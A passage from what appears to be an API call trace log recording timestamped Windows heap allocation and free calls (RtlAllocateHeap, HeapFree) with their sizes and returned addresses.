(in: hHeap=0x430000, dwFlags=0x0, lpMem=0x467a20 | out: hHeap=0x430000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x920) returned 0x46cb30 [0083.452] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46cb30 | out: hHeap=0x430000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b47) returned 0x47d920 [0083.452] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xd90) returned 0x46cb30 [0083.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6d0) returned 0x47f470 [0083.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46cb30 | out: hHeap=0x430000) returned 1 [0083.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f470 | out: hHeap=0x430000) returned 1 [0083.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5d0) returned 0x4488f0 [0083.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6adf) returned 0x4493c0 [0083.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4683d0 | out: hHeap=0x430000) returned 1 [0083.453] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1887) returned 0x47d920 [0083.453] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xc30) returned 0x47f1b0 [0083.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x620) returned 0x4488f0 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f1b0 | out: hHeap=0x430000) returned 1 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8f0) returned 0x47d920 [0083.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x480) returned 0x4488f0 [0083.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x240) returned 0x47e220 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.454] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47e220 | out: hHeap=0x430000) returned 1 [0083.454] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x4407a0 [0083.455] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b6f0 | out: hHeap=0x430000) returned 1 [0083.455] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db20 | out: hHeap=0x430000) returned 1 [0083.456] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.456] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4407a0 | out: hHeap=0x430000) returned 1 [0083.456] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x4493c0 [0083.457] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47d920 [0083.460] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x45db20 [0083.461] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.461] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b6f0 [0083.461] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x4493c0 [0083.461] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47d920 [0083.579] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.579] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x47d920 [0083.580] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.580] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440200 [0083.580] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b6f0 | out: hHeap=0x430000) returned 1 [0083.580] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x453770 | out: hHeap=0x430000) returned 1 [0083.581] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46da20 | out: hHeap=0x430000) returned 1 [0083.581] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4409d0 | out: hHeap=0x430000) returned 1 [0083.581] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4493c0 [0083.582] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x467460 [0083.582] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8) returned 0x438ce0 [0083.582] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x487260 [0083.582] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449380 [0083.582] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438ce0 | out: hHeap=0x430000) returned 1 [0083.582] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x49a470 [0083.583] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x18) returned 0x4492c0 [0083.583] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449380 | out: hHeap=0x430000) returned 1 [0083.583] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4ad680 [0083.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b6f0 [0083.584] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4492c0 | out: hHeap=0x430000) returned 1 [0083.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4c0890 [0083.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x30) returned 0x448530 [0083.584] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b6f0 | out: hHeap=0x430000) returned 1 [0083.584] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4d3aa0 [0083.585] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4e6cb0 [0083.585] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x440ac0 [0083.585] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448530 | out: hHeap=0x430000) returned 1 [0083.585] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4f9ec0 [0083.586] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x50d0d0 [0083.586] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e10080 [0083.587] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438ce0 [0083.587] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440ac0 | out: hHeap=0x430000) returned 1 [0083.587] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e23290 [0083.587] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e364a0 [0083.588] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e496b0 [0083.588] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e5c8c0 [0083.589] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x98) returned 0x435090 [0083.589] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438ce0 | out: hHeap=0x430000) returned 1 [0083.589] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e6fad0 [0083.589] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e82ce0 [0083.590] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e95ef0 [0083.590] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ea9100 [0083.591] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ebc310 [0083.592] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ecf520 [0083.593] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0) returned 0x438ce0 [0083.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x435090 | out: hHeap=0x430000) returned 1 [0083.593] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ee2730 [0083.594] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2000080 [0083.594] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2013290 [0083.595] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20264a0 [0083.595] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20396b0 [0083.596] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x204c8c0 [0083.596] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x205fad0 [0083.597] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2072ce0 [0083.597] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2085ef0 [0083.598] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x150) returned 0x43b090 [0083.598] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438ce0 | out: hHeap=0x430000) returned 1 [0083.598] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2099100 [0083.598] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20ac310 [0083.599] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20bf520 [0083.599] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20d2730 [0083.600] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20e5940 [0083.600] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20f8b50 [0083.601] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x210bd60 [0083.601] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x211ef70 [0083.602] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2132180 [0083.603] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2145390 [0083.603] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21585a0 [0083.604] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x216b7b0 [0083.604] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x217e9c0 [0083.605] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2191bd0 [0083.605] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1f8) returned 0x4488f0 [0083.605] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b090 | out: hHeap=0x430000) returned 1 [0083.605] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21a4de0 [0083.605] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21b7ff0 [0083.606] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21cb200 [0083.606] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21de410 [0083.607] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2200080 [0083.608] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2213290 [0083.609] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22264a0 [0083.609] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22396b0 [0083.609] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x224c8c0 [0083.610] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x225fad0 [0083.610] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2272ce0 [0083.611] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2285ef0 [0083.611] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2299100 [0083.612] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22ac310 [0083.612] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22bf520 [0083.613] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22d2730 [0083.613] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22e5940 [0083.613] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22f8b50 [0083.614] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x230bd60 [0083.615] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x231ef70 [0083.729] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2332180 [0083.729] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f0) returned 0x448af0 [0083.729] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.729] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2345390 [0083.730] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23585a0 [0083.730] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x236b7b0 [0083.730] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x237e9c0 [0083.731] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2391bd0 [0083.731] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23a4de0 [0083.731] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23b7ff0 [0083.732] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23cb200 [0083.732] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23de410 [0083.733] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23f1620 [0083.733] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2404830 [0083.733] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2417a40 [0083.734] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x242ac50 [0083.734] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x243de60 [0083.735] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2451070 [0083.735] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2464280 [0083.736] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2477490 [0083.736] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x248a6a0 [0083.737] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x249d8b0 [0083.737] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24b0ac0 [0083.738] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24c3cd0 [0083.738] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24d6ee0 [0083.738] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24ea0f0 [0083.739] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24fd300 [0083.739] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2510510 [0083.740] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2523720 [0083.740] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2536930 [0083.740] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2549b40 [0083.740] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x255cd50 [0083.741] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x256ff60 [0083.741] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2583170 [0083.742] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x468) returned 0x45c5d0 [0083.742] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448af0 | out: hHeap=0x430000) returned 1 [0083.742] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2596380 [0083.742] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25a9590 [0083.743] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25bc7a0 [0083.743] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25cf9b0 [0083.744] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25e2bc0 [0083.744] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2600080 [0083.745] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2613290 [0083.746] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26264a0 [0083.746] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26396b0 [0083.747] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x264c8c0 [0083.747] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x265fad0 [0083.747] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2672ce0 [0083.748] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2685ef0 [0083.748] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2699100 [0083.749] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26ac310 [0083.749] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26bf520 [0083.749] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26d2730 [0083.750] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26e5940 [0083.750] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26f8b50 [0083.751] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x270bd60 [0083.751] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x271ef70 [0083.752] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2732180 [0083.752] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2745390 [0083.753] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27585a0 [0083.753] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x276b7b0 [0083.754] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x277e9c0 [0083.754] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2791bd0 [0083.754] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27a4de0 [0083.754] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27b7ff0 [0083.755] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27cb200 [0083.755] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27de410 [0083.756] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27f1620 [0083.756] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2804830 [0083.757] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2817a40 [0083.757] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x282ac50 [0083.758] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x283de60 [0083.758] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2851070 [0083.759] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2864280 [0083.759] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2877490 [0083.760] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x288a6a0 [0083.760] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x289d8b0 [0083.760] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28b0ac0 [0083.761] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28c3cd0 [0083.761] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28d6ee0 [0083.762] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28ea0f0 [0083.762] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28fd300 [0083.762] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2910510 [0083.763] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x698) returned 0x4488f0 [0083.763] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5d0 | out: hHeap=0x430000) returned 1 [0083.763] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2923720 [0083.876] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2936930 [0083.877] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2949b40 [0083.877] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x295cd50 [0083.877] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x296ff60 [0083.877] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2983170 [0083.878] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2996380 [0083.878] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29a9590 [0083.879] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29bc7a0 [0083.879] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29cf9b0 [0083.879] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29e2bc0 [0083.880] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29f5dd0 [0083.880] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a08fe0 [0083.881] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a1c1f0 [0083.881] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a2f400 [0083.882] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a42610 [0083.882] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a55820 [0083.882] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a68a30 [0083.883] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a7bc40 [0083.883] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a8ee50 [0083.884] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2aa2060 [0083.884] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ab5270 [0083.885] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ac8480 [0083.885] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2adb690 [0083.886] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2aee8a0 [0083.886] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b01ab0 [0083.886] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b14cc0 [0083.886] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b27ed0 [0083.887] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b3b0e0 [0083.887] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b4e2f0 [0083.888] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b61500 [0083.888] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b74710 [0083.889] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b87920 [0083.889] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b9ab30 [0083.889] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2badd40 [0083.890] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bc0f50 [0083.890] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bd4160 [0083.891] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2be7370 [0083.891] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bfa580 [0083.892] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c0d790 [0083.892] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c209a0 [0083.892] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c33bb0 [0083.894] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c46dc0 [0083.895] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c59fd0 [0083.895] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c6d1e0 [0083.896] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c803f0 [0083.896] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c93600 [0083.897] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ca6810 [0083.897] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cb9a20 [0083.897] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, 